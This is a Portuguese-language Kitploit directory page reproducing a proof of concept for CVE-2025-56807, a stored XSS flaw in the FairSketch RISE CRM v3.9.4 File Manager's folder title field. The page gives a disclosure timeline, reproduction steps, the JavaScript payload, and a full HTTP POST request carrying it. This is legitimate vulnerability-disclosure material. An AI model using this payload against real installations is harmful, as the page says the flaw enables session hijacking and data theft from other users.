Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-56807 — Prova de conceito para uma vulnerabilidade de XSS armazenado no FairSketch RISE Ultimate Project Manager & CRM v3.9.4, demonstrando a execução arbitrária de JavaScript por meio de injeção no título da pasta. | Kitploit
Ferramentas/GitHubGitHub/aqwainfosec/cve-2025-56807
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

Prova de conceito para uma vulnerabilidade de XSS armazenado no FairSketch RISE Ultimate Project Manager & CRM v3.9.4, demonstrando a execução arbitrária de JavaScript por meio de injeção no título da pasta.

Ver Repositório
há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-56807

Descrição

Uma vulnerabilidade de Cross Site Scripting (XSS) Armazenado foi descoberta no FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) na funcionalidade do Gerenciador de Arquivos. A vulnerabilidade está no parâmetro de título que é enviado ao criar novas pastas. Devido à sanitização insuficiente de entrada, um atacante pode injetar payloads HTML/JavaScript (ex.: <details/open/ontoggle=prompt(origin)>). O payload é armazenado no nome da pasta e executado ao listar pastas no Gerenciador de Arquivos, permitindo a execução arbitrária de JavaScript no navegador de qualquer usuário que visualize a pasta afetada. Isso pode resultar em sequestro de sessão e exfiltração de dados.

[!NOTE]
Esta vulnerabilidade não é exclusiva de contas de administrador. Ela pode ser explorada usando qualquer conta de usuário que tenha permissão para criar novas pastas no Gerenciador de Arquivos.

Cronograma de Divulgação

  • ID CVE atribuído: CVE-2025-56807
  • Descoberta: julho de 2025 (por Aqwa Hameed)
  • Fornecedor notificado: e-mail enviado ao suporte da Fairsketch
  • Resposta: reconhecido pelo fornecedor em 22 de julho de 2025

Prova de Conceito (PoC)

  1. Faça login com credenciais válidas.

  2. Navegue até Arquivos

    Painel

  3. Clique em Nova Pasta

    Gerenciador de Arquivos

  4. Insira o payload abaixo no campo Título e digite:

root@kitploit:~
<details/open/ontoggle=prompt(origin)>

Título da Pasta

  1. Recarregue a página do Gerenciador de Arquivos para acionar o payload

    Execução do Payload

Requisição

root@kitploit:~
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
Baixar ferramenta